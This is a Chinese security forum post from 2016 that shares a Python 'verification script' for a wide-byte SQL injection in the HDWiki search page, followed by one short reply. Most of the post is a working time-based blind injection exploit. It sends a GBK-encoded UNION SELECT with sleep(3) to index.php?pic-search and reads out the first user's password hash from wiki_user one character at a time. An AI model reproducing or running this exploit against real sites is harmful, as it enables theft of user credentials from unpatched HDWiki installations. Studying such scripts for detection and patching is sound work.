查看: 15192|回复: 1

hdwiki最新版宽字节注入验证脚本

[复制链接]
发表于 2016-6-1 20:13:03 | 显示全部楼层 |阅读模式
本帖最后由 blackfish 于 2016-6-1 20:23 编辑

漏洞来源:http://0day5.com/archives/3351
[AppleScript] 纯文本查看 复制代码
import requests

import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

name = ""

for i in range(1,32):

    for p in payloads:

        s1 = "%s" %(i)

        s2 = "%s" %(ord(p))

        

        start_time = time.time()

        try:

            

            payload = {'searchtext':"鐩搁對' UNION SELECT if(ORD(mid((select password from wiki_user limit 0,1),"+s1+",1))="+s2+",sleep(3),0)#"}

            

            r = requests.post("http://localhost/hdwiki/index.php?pic-search", data=payload,timeout=30)

            if time.time() - start_time > 3.0:

                name = name+p

                print name+'.....'

        except requests.RequestException as e:

            

            break

        

print '\n[Done]MySQL user is ' + name

QQ图片20160531214556.jpg
回复

使用道具 举报

发表于 2016-6-1 22:17:16 | 显示全部楼层
这特么去年的你
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 08:39 , Processed in 0.076392 second(s), 25 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部